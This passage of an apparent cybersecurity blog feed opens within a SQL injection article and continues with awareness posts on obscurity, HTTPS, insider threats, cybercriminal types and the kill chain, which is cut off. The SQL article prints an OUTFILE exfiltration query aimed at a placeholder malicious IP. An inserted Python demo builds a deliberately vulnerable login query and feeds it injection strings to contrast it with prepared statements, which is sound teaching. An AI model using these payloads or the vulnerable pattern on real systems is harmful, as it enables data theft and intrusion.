<!--kg-card-end: markdown--><p>If the response to such a query is delayed, the attacker would know that the application is vulnerable to time-based SQL injection attacks.</p><h3 id="out-of-band-sql-injection">Out-of-Band SQL Injection</h3><p>When an attacker is unable to gather the results of a SQL injection through the same channel, out-of-band SQL injection techniques are alternatives to inferential or blind SQL injection attack techniques.</p><p>Usually, these techniques involve sending data from the target application database to an attacker&apos;s remote location. This process, however, is highly dependent on the capabilities of the target database management system.</p><p>An out-of-band SQL injection attack makes use of your database management system&apos;s ability to work with external files. In MySQL for example, the <em><a href="https://dev.mysql.com/doc/refman/8.0/en/string-functions.html?ref=thecyberpatch.com#function_load-file">LOAD_FILE()</a> </em>and <em><a href="https://mariadb.com/kb/en/select-into-outfile/?ref=thecyberpatch.com">INTO OUTFILE</a> </em>functions can instruct MySQL to transmit the data to an external source. Below is an example of how an attacker might use OUTFILE to send the results of a query to an external source:</p><!--kg-card-begin: markdown--><pre><code>SELECT * FROM users 
INTO OUTFILE &apos;\\\\MALICIOUS_IP_ADDRESS\location&apos;
</code></pre>
<!--kg-card-end: markdown--><p>Similarly, LOAD_FILE() may be used to read a file from the server and display its contents. Suppose an attacker combines the LOAD_FILE() and OUTFILE functions. In that case, it is possible to read the contents of a file on the target server and then forward it to a remote location.</p><h2 id="how-to-prevent-sql-injections">How to Prevent SQL Injections</h2><p>As we now know, an attacker can use an SQL injection vulnerability to access, read, modify, or even destroy your database&apos;s contents.</p><p>Additionally, such a vulnerability could enable an attacker to read a file on any location within the target server and transfer the contents elsewhere. Let&apos;s now explore various techniques to protect your web application and website against SQL injection attacks.</p><h2 id="never-trust-input">Never Trust Input</h2><p>The most important aspect of preventing SQL injections can be summed up in a single sentence: <strong><em>Always assume all input to be malicious</em></strong><em>.</em> By all input, I mean any information from outside your application that the application itself did not generate.</p><p>So, don&apos;t trust data from third-party systems or plugins your application imports. Also, any data provided by the user, such as form fields, URL parameters, or user-provided files, should always be automatically distrusted. Data from APIs your app consumes also go on that list. These examples are far from exhaustive, but the same rule applies. Always consider input as malicious by default. Verify it first, and only when you deem it safe should you proceed.</p><h3 id="use-prepared-statements">Use Prepared Statements</h3><p>A prepared statement is a template of an SQL query, where you specify parameters at a later stage to execute it. Here is an example of a prepared statement in PHP and MySQL.</p><!--kg-card-begin: markdown--><pre><code>$query = $mysql_connection-&gt;prepare(&quot;SELECT * FROM users WHERE username = ? 
AND password = ?&quot;);

$query-&gt;execute(array($username, $password));
</code></pre>
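<p>The login query from earlier in this article, run both ways, as an added example that is not part of the original post. It uses Python&apos;s built-in sqlite3 module with an in-memory database instead of the article&apos;s PHP and MySQL stack, and the table rows, function names and admin password are constructed for illustration.</p>

```python
import sqlite3

# Constructed sample rows. Passwords are plaintext only because the article's
# walkthrough assumes that; real systems store salted hashes.
SAMPLE_USERS = [
    ("admin", "correct-horse-admin"),
    ("johnbrown", "johnpassword"),
]


def open_sample_db():
    """Create an in-memory database holding the sample users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_concatenated_query(user, password):
    """Mirror the article's vulnerable PHP: input is pasted into the SQL text."""
    return (
        "SELECT * FROM users WHERE username = '" + user
        + "' AND password = '" + password + "';"
    )


def login_concatenated(conn, user, password):
    """Vulnerable: quotes and comment markers in the input change the query."""
    row = conn.execute(build_concatenated_query(user, password)).fetchone()
    return row[0] if row else None


def login_prepared(conn, user, password):
    """Hardened: the ? placeholders bind input as values, never as SQL."""
    row = conn.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (user, password),
    ).fetchone()
    return row[0] if row else None


# The inputs the article walks through: (label, username, password).
ARTICLE_INPUTS = [
    ("valid login", "johnbrown", "johnpassword"),
    ("comment after username", "admin';--", "blahblahblah"),
    ("boolean clause in password", "admin", "blahblahblah' or 1=1;--"),
]


def compare_logins():
    """Run every input through both functions and collect who got logged in."""
    conn = open_sample_db()
    results = []
    for label, user, password in ARTICLE_INPUTS:
        results.append(
            (label,
             login_concatenated(conn, user, password),
             login_prepared(conn, user, password))
        )
    conn.close()
    return results


if __name__ == "__main__":
    for label, concatenated, prepared in compare_logins():
        print(f"{label}: concatenated={concatenated!r} prepared={prepared!r}")
```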
<!--kg-card-end: markdown--><h3 id="execute-with-the-least-privilege-possible">Execute with the Least Privilege Possible</h3><p>This tip is different from the previous ones. Here, we&apos;ll leave the realm of programming languages for a bit and instead, venture into the database.</p><p>This tip is less about avoiding SQL injections and more about mitigating their effects, should they happen.</p><p>The idea itself is straightforward: In areas where you&apos;re just reading data, don&apos;t use connection strings in which the user has writing privileges. That way, even if an attacker manages to inject a malicious query, they won&apos;t be able to insert, change, or delete any data.</p><p>There are many more ways to prevent SQL injection attacks that this article did not go into (such as using Web Application Firewalls and stored procedures), but fret not. More information on how to prevent SQL injection attacks is simply a Google search away.</p><h1 id="resources">Resources</h1><ol><li><a href="https://portswigger.net/web-security/sql-injection/lab-login-bypass?ref=thecyberpatch.com">SQL injection lab</a> - Login Bypass</li><li><a href="http://sqlmap.org/?ref=thecyberpatch.com">SQL Map</a> is an open-source tool that automates the process of detecting and exploiting SQL injection vulnerabilities.</li><li><a href="https://github.com/m4ll0k/Atlas?ref=thecyberpatch.com">Atlas</a> is an open-source tool that can suggest SQLMAP tampers to bypass WAF/IDS/IPS.</li><li>This <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection?ref=thecyberpatch.com">repository</a> has some cool resources on SQL Injection. 
It includes some cheat sheets and many useful payloads that can be used depending on the use case.</li></ol>]]></content:encoded></item><item><title><![CDATA[CompTIA Feature: A Day in the Life of an Information Security Consultant]]></title><description><![CDATA[CompTIA spoke with Lomar about his professional experience, and he offered direction to those interested in entering the cybersecurity field.]]></description><link>https://thecyberpatch.com/a-day-in-the-life-of-an-information-security-consultant/</link><guid isPermaLink="false">5fa59af186559534a6d6d2b1</guid><category><![CDATA[Career Development]]></category><dc:creator><![CDATA[Lomar Lilly]]></dc:creator><pubDate>Fri, 05 Jun 2020 17:52:00 GMT</pubDate><media:content url="https://thecyberpatch.com/content/images/2020/11/DayLife.jpg" medium="image"/><content:encoded><![CDATA[<!--kg-card-begin: html--><img src="https://thecyberpatch.com/content/images/2020/11/DayLife.jpg" alt="CompTIA Feature: A Day in the Life of an Information Security Consultant"><p style="text-align:justify"><a href="https://thecyberpatch.com/">Lomar Lilly,</a> a senior information security consultant working in Jamaica for Symptai Consulting Limited, holds multiple CompTIA cybersecurity certifications, including <a href="https://www.comptia.org/certifications/security?ref=thecyberpatch.com">CompTIA Security+,</a> <a href="https://www.comptia.org/certifications/cybersecurity-analyst?ref=thecyberpatch.com">CompTIA Cybersecurity Analyst (CySA+), </a><a href="https://www.comptia.org/certifications/pentest?ref=thecyberpatch.com">CompTIA PenTest+</a> and <a href="https://www.comptia.org/certifications/comptia-advanced-security-practitioner?ref=thecyberpatch.com">CompTIA Advanced Security Practitioner (CASP). 
</a>CompTIA spoke with him about his professional experience, and he offered direction to those interested in entering the cybersecurity field.</p><!--kg-card-end: html--><h2 id="how-does-your-job-in-it-compare-to-other-9-to-5-jobs">How does your job in IT compare to other 9-to-5 jobs?</h2><!--kg-card-begin: html--><p style="text-align:justify">I have worked many 9-to-5 jobs outside of IT, and I can say with confidence that those jobs are incomparable to what I&#x2019;m now doing. Watching the clock, waiting for lunch and looking forward to the end of the workday basically sums up how I remember spending my time in previous jobs.</p>

<p style="text-align:justify">Now, being in a <a href="https://www.comptia.org/blog/cybersecurity-jobs-everything-you-ever-wanted-to-know?ref=thecyberpatch.com">cybersecurity role</a> in an engaging environment, my work life is very different. I can&#x2019;t count the number of times I&#x2019;ve said to myself at the end of the workday, &#x201C;What? It&#x2019;s 5 o&#x2019;clock already?&#x201D;</p><!--kg-card-end: html--><!--kg-card-begin: html--><p><a href="https://www.comptia.org/blog/a-day-in-the-life-of-an-information-security-consultant?ref=thecyberpatch.com">Read the Full Article at CompTIA.org</a></p><!--kg-card-end: html-->]]></content:encoded></item><item><title><![CDATA[Security Through Obscurity: The Good, The Bad, The Ugly]]></title><description><![CDATA[Security Through Obscurity is based on the premise that the secrecy of specific details or functions of a system can ensure Security. Let's explore this concept in its entirety to expose the good, the bad, and the ugly.]]></description><link>https://thecyberpatch.com/security-through-obscurity-the-good-the-bad-the-ugly/</link><guid isPermaLink="false">5ff1664906fe25017eb4f2d8</guid><category><![CDATA[Cyber Knowledge]]></category><dc:creator><![CDATA[Lomar Lilly]]></dc:creator><pubDate>Wed, 27 May 2020 05:55:00 GMT</pubDate><media:content url="https://thecyberpatch.com/content/images/2021/01/security_through_obscurity_cover.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://thecyberpatch.com/content/images/2021/01/security_through_obscurity_cover.jpg" alt="Security Through Obscurity: The Good, The Bad, The Ugly"><p>Security Through Obscurity (STO) is a controversial topic within the infosec community. It is commonly based on the premise that the secrecy of specific details or functions of a system can ensure Security. As such, many cybersecurity professionals frown on the idea of implementing Security through obscurity because it is a &quot;Bad&quot; practice. 
Basing their conclusion on the premise previously mentioned, they aren&apos;t wrong; however, that&apos;s just half the picture. Let&apos;s explore this concept in its entirety to expose the good, the bad, and the ugly.</p><h2 id="what-exactly-is-security-through-obscurity-sto-">What Exactly is Security Through Obscurity (STO)?</h2><p>Simply put, <a href="https://en.wikipedia.org/wiki/Security_through_obscurity?ref=thecyberpatch.com">Security Through Obscurity</a> is based primarily on hiding vital information and enforcing secrecy as the primary security technique. Generally, when implementing STO, it is assumed that, as long as attackers lack information about the system&apos;s internal design, they will not get at its vulnerabilities. While the assumption is not entirely inaccurate, there are a few things you should take into consideration.</p><h2 id="security-through-obscurity-the-good">Security Through Obscurity: The Good</h2><p>Used along with other security mechanisms, such as TCP Wrappers, proper firewalling, IP-based restrictions, 2FA, Security Through Obscurity can be a very efficient way to reduce the chances of an attack. How? Well, for starters, it <strong>slows </strong>one of the most critical phases of the <a href="https://null-byte.wonderhowto.com/how-to/five-phases-hacking-0167990/?ref=thecyberpatch.com">hacking methodology</a> - Reconnaissance.</p><p><a href="https://www.tutorialspoint.com/ethical_hacking/ethical_hacking_reconnaissance.htm?ref=thecyberpatch.com">Reconnaissance </a>or recon for short is a phase of the hacking methodology where the attacker sets out to learn as much information about the target system in an attempt to launch an effective attack.</p><p>Having implemented STO would have slowed this process down, potentially deterring non <a href="https://www.kaspersky.com/resource-center/definitions/advanced-persistent-threats?ref=thecyberpatch.com">APTs </a>from following through with an attack. 
Details such as banner information, default configuration settings, and default system reactions are hidden or altered when using STO to throw attackers off.</p><p>For example, you can remove <a href="https://en.wikipedia.org/wiki/Banner_grabbing?ref=thecyberpatch.com">banner information</a>, such as the webserver version number (e.g., nginx 1.6.1) or the version number and name of the software running on the webserver (e.g., WordPress 5.6). Another example would be to change default ports for services such as SSH. SSH is known to run on port 22, but what if you change that operation port to 65822? Again, bear in mind that these tactics might only <strong>slow </strong>the recon and the exploitation phase, so beware of the bad and the ugly.</p><p>Coupled with your intrusion detection and prevention system (IDS), using STO techniques could allow for early detection of ongoing attacks. How? Suppose an attacker forgoes the recon phase because of the lack of information available and decides to execute a <a href="https://github.com/thezakman/CTF-Heaven/blob/master/extra/hail-mary-attack.md?ref=thecyberpatch.com">Hail Mary Attack</a>. In that case, the attacker loses his stealth, and you&apos;ll know an attack is ongoing.</p><h2 id="security-through-obscurity-the-bad">Security Through Obscurity: The Bad</h2><p>STO is only useful when used as an additional layer of defense. <strong>Solely relying on STO</strong> to protect your assets is a bad idea. STO will not be effective against blind attacks or <a href="https://www.kaspersky.com/resource-center/definitions/advanced-persistent-threats?ref=thecyberpatch.com">APTs</a>.</p><p>Let me repeat it for the people in the back. 
<strong>Solely </strong>relying on Security through Obscurity as a Security mechanism is a <strong>BAD </strong>idea.</p><h2 id="security-through-obscurity-the-ugly">Security Through Obscurity: The Ugly</h2><p>Some professionals would argue that using STO as your only layer of defense puts you at HIGH risk because essentially, you have zero protection, and in today&apos;s climate, that&apos;s not bad; that&apos;s ugly.</p><h2 id="conclusion">Conclusion</h2><p>When cybersecurity professionals talk about STO, the real concern is that Security is implemented solely through obscurity - a state where the only protection mechanism involved is hiding critical details or functions of an asset.</p><p>STO can slow reconnaissance activity, and force the attacker to initiate actions that can no longer be as stealthy, resulting in increased exposure. Obscurity measures can complement Security, and as long as they are not employed in complete isolation, they can be considered another powerful tool to provide defense in depth.</p>]]></content:encoded></item><item><title><![CDATA[The 'S' in HTTPS is For 'Secure' Not 'Safe']]></title><description><![CDATA["Ensure that the website you are browsing or entering confidential information such as usernames, passwords, or credit card information uses HTTPS." 
While this tip is vital to bear in mind when browsing the web, many misunderstand it, and this article seeks to set the record straight.]]></description><link>https://thecyberpatch.com/https-means-secure-not-safe/</link><guid isPermaLink="false">5fdf9a02469b185d5e8454b8</guid><category><![CDATA[Cyber Knowledge]]></category><category><![CDATA[Cyber Tips]]></category><dc:creator><![CDATA[Lomar Lilly]]></dc:creator><pubDate>Wed, 20 May 2020 17:47:00 GMT</pubDate><media:content url="https://thecyberpatch.com/content/images/2020/12/https-does-not-mean-safe-featured--1-.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://thecyberpatch.com/content/images/2020/12/https-does-not-mean-safe-featured--1-.jpg" alt="The &apos;S&apos; in HTTPS is For &apos;Secure&apos; Not &apos;Safe&apos;"><p>As a cybersecurity tip, you will always hear &quot;ensure that the website you are browsing or entering confidential information such as usernames, passwords, or credit card information uses <a href="https://www.cloudflare.com/learning/ssl/what-is-https/?ref=thecyberpatch.com">HTTPS</a>.&quot; While this tip is vital to bear in mind when browsing the web, many misunderstand it, and this article seeks to set the record straight.</p><p>Simply put, HTTPS means that the website was issued a certificate from a certificate authority (CA), and a pair of <a href="https://encyclopedia.kaspersky.com/glossary/cryptographic-key/?utm_source=kdaily&amp;utm_medium=blog&amp;utm_campaign=termin-explanation">cryptographic keys</a> were generated for it. These keys allow the website to encrypt information transmitted between you and the website itself, making it perfect for protecting sensitive data such as your passwords and credit card information in transit from prying eyes. 
However, many mistake HTTPS to mean that the website is safe from all types of web-based attacks, which is not the case.</p><p>It should be made clear that issued certificates say nothing about the site itself, as a phishing page or any other malicious site can just as easily get a certificate and encrypt all traffic that flows between you and it. According to an article written by <a href="https://info.phishlabs.com/blog/quarter-phishing-attacks-hosted-https-domains?ref=thecyberpatch.com">Phishlabs in 2017</a>, a quarter of all phishing attacks are carried out on HTTPS sites. Moreover, <a href="https://info.phishlabs.com/blog/quarter-phishing-attacks-hosted-https-domains?ref=thecyberpatch.com">more than 80% of users </a>believe that the mere presence of a little green lock and the word &quot;Secure&quot; next to the URL means the site is safe, and they don&apos;t think too hard before entering their data.</p><figure class="kg-card kg-image-card"><img src="https://thecyberpatch.com/content/images/2020/12/secure-site.jpg" class="kg-image" alt="The &apos;S&apos; in HTTPS is For &apos;Secure&apos; Not &apos;Safe&apos;" loading="lazy" width="531" height="123"></figure><p>Still not clear? Let&apos;s explore this scenario. You clicked on a phishing link that took you to a fake version of your bank&apos;s website, for example. That phony website may use HTTPS, which securely transports your information to the criminals to collect it. Sure, HTTPS ensures that no one <em>else</em> can spy on the data you enter. But your information can still be stolen by the website itself if it&apos;s fake.</p><p>In conclusion, your biggest takeaway from this article should be that the presence of a certificate and the green lock means only that the data transmitted between you and the website is encrypted and that a trusted certificate authority issued the certificate. 
But it doesn&apos;t prevent an HTTPS site from being malicious, a fact that phishing scammers skillfully exploit. So always be alert, no matter how safe the website may seem at first glance. Never enter confidential information such as passwords, banking credentials, or any other personal information on websites if you are unsure of their authenticity. To check the authenticity of a website, you can always check the domain name very carefully, as the name of a fake webpage might differ by only one character.</p>]]></content:encoded></item><item><title><![CDATA[Combating Insider Threats]]></title><description><![CDATA[Insider threats represent the primary vector for 60% of data breaches, so organizations need to examine the threats walking through their door every day with as much thoroughness as they show when securing the perimeter from external threats.]]></description><link>https://thecyberpatch.com/combating-insider-threats/</link><guid isPermaLink="false">5fa6e347b985673fd7500038</guid><category><![CDATA[Cyber Tips]]></category><dc:creator><![CDATA[Lomar Lilly]]></dc:creator><pubDate>Wed, 13 May 2020 17:18:00 GMT</pubDate><media:content url="https://thecyberpatch.com/content/images/2020/11/insiderthreat.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://thecyberpatch.com/content/images/2020/11/insiderthreat.jpg" alt="Combating Insider Threats"><p>An <a href="https://www.varonis.com/blog/insider-threats/?ref=thecyberpatch.com">insider threat</a> is a security risk that originates within the targeted organization. The actors do not have to be current employees or officers within the organization; they could also be consultants, former employees, business partners, or board members. 
With insider threats representing the primary vector for <a href="https://securityintelligence.com/posts/what-are-insider-threats-and-how-can-you-mitigate-them/?ref=thecyberpatch.com">60% of data breaches</a>, organizations need to examine the threats walking through their door every day with as much thoroughness as they show when securing the perimeter from external threats. According to the <a href="https://153j3ttjub71nfe89mc7r5gb-wpengine.netdna-ssl.com/wp-content/uploads/2018/04/ObserveIT-Insider-Threat-Global-Report-FINAL.pdf?ref=thecyberpatch.com">Ponemon Institute</a>, the average cost of insider-caused incidents was $8.76 million in 2017, which was more than twice the $3.86 million global average cost of all breaches during the same year. According to <a href="https://enterprise.verizon.com/resources/reports/insider-threat-report.pdf?ref=thecyberpatch.com">Verizon</a>, there are five main classifications for insider threats. These are:</p><ol><li><strong><em>The careless worker</em></strong>. These are employees who engage in inappropriate behaviour, much of which falls into the category of &quot;<a href="https://whatis.techtarget.com/feature/How-to-assess-and-prioritize-insider-threat-risk?_ga=2.261237316.854566178.1598109044-777454906.1584566806&amp;ref=thecyberpatch.com">Shadow IT</a>.&quot; Shadow IT describes users who procure or use a cloud application, such as a file-sharing app to increase productivity, but inadvertently expose the company. These behaviours can include misappropriating resources, breaking acceptable use and security policies, using unapproved workarounds, and installing unauthorized applications. And while these behaviours tend not to be malicious, they can open up new vulnerabilities within an organization. 
In combating these types of insider threats, organizations can impose consequences such as fines, demotions, or job termination whenever employees engage in these behaviours.</li><li><strong><em>The inside agent</em></strong>. These are individuals who cooperate with a third party, frequently competitors or nation-states, to use their access in a way that intentionally causes harm to the organization. Bad actors will recruit or bribe susceptible insiders to steal information on their behalf. Having proper data loss prevention mechanisms is a good defense in combating this type of malicious insider. <a href="https://securityintelligence.com/these-5-types-of-insider-threats-could-lead-to-costly-data-breaches/?ref=thecyberpatch.com">Insider-caused incidents, including collusion, are among the costliest</a> categories of a breach and may take four times longer to detect than incidents caused by individual insiders.</li><li><strong><em>The Disgruntled Employee</em></strong>. These are insiders who try to harm their organization by destroying data or disrupting business activity. This form of insider threat stems from employees who often feel that they have been wronged by the organization and attempt to lash out as an act of revenge. To combat this form of insider threat, have employees sign non-disclosure agreements that explicitly outline the consequences of sharing company secrets with outside parties. This will be somewhat of a deterrent for persons seeking to enact their revenge through data exposure.</li><li><strong><em>The Malicious Insider</em></strong>. These are employees who are aware of their actions and the negative implications for the organization, yet still pursue those actions. 
Malicious insiders are especially dangerous when they have elevated levels of privilege, such as system administrators or database administrators, with a classic example of such being <a href="https://www.bbc.com/news/world-us-canada-23123964?ref=thecyberpatch.com">Edward Snowden</a>, who used his access to classified systems to leak information relating to cyber espionage at the NSA. Combating this type of insider threat can be tricky. Still, one recommendation I think could work is to limit a single employee&apos;s access to sensitive information as much as possible throughout the organization. No one person should be able to access, view, or modify confidential information without needing a second or third individual for authorization. I believe this method could be useful as a malicious insider would need to justify their reasoning for accessing certain information.</li><li><strong><em>The Pawn</em></strong>. A pawn is just a regular employee who makes a mistake that a bad actor exploits or that otherwise leads to data loss or compromise. Whether it&apos;s an unwitting employee downloading malware to their workstation or a user disclosing credentials to a third party pretending to be a help desk employee, this vector is <a href="https://securityintelligence.com/posts/what-are-insider-threats-and-how-can-you-mitigate-them/?ref=thecyberpatch.com">one of the broader targets for attackers</a> seeking to cause harm to the organization. The best way to combat this form of insider threat is through ongoing employee security awareness training. A company that partners with employees to ensure security awareness will do better than one that forces compliance or performs training to check a box.</li></ol>]]></content:encoded></item><item><title><![CDATA[Cybersecurity is Everyone’s Responsibility]]></title><description><![CDATA[40% of employees believe that they assume no responsibility for securing information. 
This thought is why many organizations place the responsibility of cybersecurity on their IT departments' shoulders, but adequate security must be a companywide endeavor.]]></description><link>https://thecyberpatch.com/cybersecurity-is-everyones-responsibility/</link><guid isPermaLink="false">5fa6e06eb985673fd7500005</guid><category><![CDATA[Cyber Knowledge]]></category><category><![CDATA[Cyber Tips]]></category><dc:creator><![CDATA[Lomar Lilly]]></dc:creator><pubDate>Wed, 06 May 2020 17:05:00 GMT</pubDate><media:content url="https://thecyberpatch.com/content/images/2020/11/1600960694-GettyImages-1169668297.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://thecyberpatch.com/content/images/2020/11/1600960694-GettyImages-1169668297.jpg" alt="Cybersecurity is Everyone&#x2019;s Responsibility"><p>Cybersecurity affects every employee, from the executive team to marketing, sales, HR, etc. For this reason, cybersecurity should be everyone&apos;s responsibility. <a href="https://www.citrix.com/blogs/2018/04/05/the-canadian-government-is-emphasizing-cybersecurity-and-companies-should-too/?ref=thecyberpatch.com">Citrix</a> found that 40% of employees believe that they assume no responsibility for securing information. This thought is why many organizations place the responsibility of cybersecurity on their IT departments&apos; shoulders, but adequate security must be a companywide endeavor. Relying on IT does make sense, as they are the tech experts who would best understand how to keep a business secure. Still, employees are at risk every time they log onto their computers, and as such, an organization should not rely solely on one team for security. Here are three reasons why I believe cybersecurity is everyone&apos;s responsibility.</p><p>1. <strong><em>Employees are Potential Targets</em></strong>. Employees within an organization engage in activities that put them at risk daily, whether they realize it or not. 
Coming across a questionable link while browsing or receiving a spam email can happen to anyone. Employees cannot avoid or help address what they do not understand and recognize. According to <a href="https://www.thinkcsc.com/make-your-employees-your-first-line-of-cybersecurity-defense/?ref=thecyberpatch.com">ThinkCSC</a>, whether the potential risks are phishing emails, ransomware, out-of-date software, unapproved applications, or malware, employees must be taught to recognize and report suspicious activity. Sophisticated cyberattacks will also target employees who hold critical positions or represent particularly vulnerable areas of the organization, including CEOs, CFOs, CIOs, etc. As such, everyone within the organization should be aware of and practice cybersecurity.</p><p>2. <strong><em>Strengthens Defense in Depth</em></strong>. <a href="https://www.forcepoint.com/cyber-edu/defense-depth?ref=thecyberpatch.com">Defense in Depth</a> is an approach to cybersecurity in which a series of defensive mechanisms are layered to protect valuable data and information. If one layer fails, another should step up immediately to thwart an attack. While technology plays a vital role on multiple levels, another essential layer of prevention is creating a security awareness culture across the organization. According to <a href="https://hello.global.ntt/en-us/insights/blog/security-is-everyones-responsibility?ref=thecyberpatch.com">Heimerl</a>, establishing a culture of security awareness within an organization is as much a mindset as it is a mode of operation. Everyone within an organization needs to adopt this new mindset to help reduce vulnerabilities as part of a collective effort and enforce Defense in Depth.</p><p>3. <strong><em>A cyber breach could affect everyone within an organization</em></strong>. A data breach&apos;s financial impact is undoubtedly one of the most immediate and hard-hitting consequences that organizations will have to deal with. 
Costs can include compensating affected customers, investigating the breach, setting up incident response efforts, legal fees, and investment into new security measures, not to mention the eye-watering regulatory penalties imposed for non-compliance with the GDPR, which could drive businesses to bankruptcy. According to <a href="https://staysafeonline.org/small-business-target-survey-data/?ref=thecyberpatch.com">The National Cybersecurity Alliance</a>, a survey of 1,008 small businesses with up to 500 employees found that after experiencing a data breach 10% went out of business, 25% had to file for bankruptcy, and 37% experienced a financial loss. Livelihoods could indeed be lost because of a breach, so everyone should protect their livelihoods.</p><p>Cybercrime is more organized and sophisticated than ever before, and as such, every person in every company, in every organization, is a security champion.</p>]]></content:encoded></item><item><title><![CDATA[Classifying Cybercriminals]]></title><description><![CDATA[Law enforcement agencies are continually challenged when finding, arresting, charging, and proving cybercrimes. 
This post will discuss five different classifications of these cybercriminals.]]></description><link>https://thecyberpatch.com/types-of-computer-criminals/</link><guid isPermaLink="false">5fa6dd7cb985673fd74fffc1</guid><category><![CDATA[Cyber Knowledge]]></category><dc:creator><![CDATA[Lomar Lilly]]></dc:creator><pubDate>Wed, 29 Apr 2020 16:53:00 GMT</pubDate><media:content url="https://thecyberpatch.com/content/images/2020/11/Malware---Available-to-Cybercriminals-in-the-Dark-Web-for-Purchase-With-Bitcoins-ITSW.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://thecyberpatch.com/content/images/2020/11/Malware---Available-to-Cybercriminals-in-the-Dark-Web-for-Purchase-With-Bitcoins-ITSW.jpg" alt="Classifying Cybercriminals"><p><a href="https://www.kaspersky.com/resource-center/threats/what-is-cybercrime?ref=thecyberpatch.com">Cybercrime</a> is a criminal activity that either targets or uses a computer, a computer network, or a networked device. According to <a href="https://online.norwich.edu/academic-programs/resources/who-are-cyber-criminals?ref=thecyberpatch.com">Norwich University</a>, cybercrimes have quickly become one of the fastest rising forms of modern crime, as approximately 1 million potential cyberattacks are attempted per day. With technology evolving daily, this number is likely to increase. <a href="https://www.trendmicro.com/vinfo/us/security/definition/cybercriminals?ref=thecyberpatch.com">Trend Micro</a> stated that laws related to cybercrime continue to evolve across various countries worldwide, with law enforcement agencies continually challenged when finding, arresting, charging, and proving cybercrimes. This post will discuss five different classifications of these cybercriminals.</p><p>1. 
<strong><a href="https://searchsecurity.techtarget.com/definition/script-kiddy-or-script-kiddie?ref=thecyberpatch.com">Script Kiddies</a></strong> - Someone who lacks programming knowledge and uses existing software to launch an attack. This classification of cybercriminals typically uses current, well-known, and easy-to-find techniques, programs, or scripts to search for and exploit vulnerabilities in other computers on the Internet, often randomly and with little regard for, or perhaps even understanding of, the potentially harmful consequences.</p><p>2. <strong><a href="https://www.imperva.com/learn/application-security/insider-threats/?ref=thecyberpatch.com">Insiders </a></strong>- Someone with authorized access to company assets who uses that access, whether maliciously or unintentionally, in a way that harms the business. An insider threat typically involves a current or former employee or business associate. There are usually three types of insider threats: a malicious insider, better known as a turncloak; a careless insider &#x2013; an innocent employee who unknowingly exposes an organization to external risks; and a mole &#x2013; technically an outsider who gained insider access to a privileged network.</p><p>3. <strong><a href="https://searchsecurity.techtarget.com/definition/advanced-persistent-threat-APT?ref=thecyberpatch.com">Advanced Persistent Threats (APT) </a></strong>- An unauthorized actor who gains access to a network or system and remains there for an extended period without being discovered. The motives of advanced persistent threat actors are varied. For example, attackers sponsored by nation-states may target intellectual property to gain a competitive advantage in specific industries. In contrast, others may be sponsored by organized crime groups to obtain information they can use to carry out criminal acts.</p><p>4. 
<strong><a href="https://www.sciencedirect.com/topics/computer-science/hacktivists?ref=thecyberpatch.com">Hacktivists </a></strong>&#x2013; Groups of criminals who unite to carry out cyber-attacks to support political causes. According to <a href="https://www.checkpoint.com/cyber-hub/threat-prevention/what-is-hacktivism/?ref=thecyberpatch.com">Check Point</a>, however, hacktivist groups&apos; motivations vary and may include more than political reasons. Revenge, social incentives, ideology, protest, a desire to embarrass specific organizations or individuals within those organizations, or sometimes sheer vandalism are examples of other motivators hacktivist groups may have.</p><p>5. <strong><a href="https://www.lookingglasscyber.com/blog/three-common-threat-actors-and-the-one-you-might-not-know-about/?ref=thecyberpatch.com">Lone Wolf (Black Hat Hacker) </a></strong>&#x2013; A hacker who breaks into a computer system or network with malicious intent, usually for monetary gain. Lone wolf attackers are difficult to track, and cyber lone wolf actors are equally difficult to find because they operate individually and on the Dark Web, known for its anonymity. As a result, lone wolf threat actors are a powerful force in the cybercrime underground.</p>]]></content:encoded></item><item><title><![CDATA[Understanding The Cyber Kill Chain]]></title><description><![CDATA[The cyber kill chain is a way to understand the sequence of events involved in cyberattacks from the early reconnaissance stages to data exfiltration. 
]]></description><link>https://thecyberpatch.com/understanding-the-cyber-kill-chain/</link><guid isPermaLink="false">5fa6d92cb985673fd74fff89</guid><category><![CDATA[Cyber Knowledge]]></category><dc:creator><![CDATA[Lomar Lilly]]></dc:creator><pubDate>Wed, 22 Apr 2020 16:41:00 GMT</pubDate><media:content url="https://thecyberpatch.com/content/images/2020/11/Cyber-Kill-Chain.jpg.pc-adaptive.full.medium.jpeg" medium="image"/><content:encoded><![CDATA[<img src="https://thecyberpatch.com/content/images/2020/11/Cyber-Kill-Chain.jpg.pc-adaptive.full.medium.jpeg" alt="Understanding The Cyber Kill Chain"><p>The cyber kill chain is a way to understand the sequence of events involved in cyberattacks from the early reconnaissance stages to data exfiltration. The kill chain helps cybersecurity professionals understand and combat malware such as ransomware, security breaches, and advanced persistent threats (APTs). The <a href="https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html?ref=thecyberpatch.com">Lockheed Martin</a> version of the cyber kill chain consists of seven (7) steps:</p><p>1. <strong><em>Reconnaissance</em></strong>. In the reconnaissance stage, attackers assess the target from outside the organization from both a technical and non-technical perspective. In this stage, the attacker, through active or passive means, works on determining which targets will return the most benefit for the resources expended in exploiting the target&apos;s information systems. The attacker will be looking for information systems with few protections or exploitable vulnerabilities. For example, through active information gathering, an attacker could identify the version of a mail server.</p><p>With this information, the attacker can research known vulnerabilities or discover new unpublished vulnerabilities that can be leveraged to access the system. 
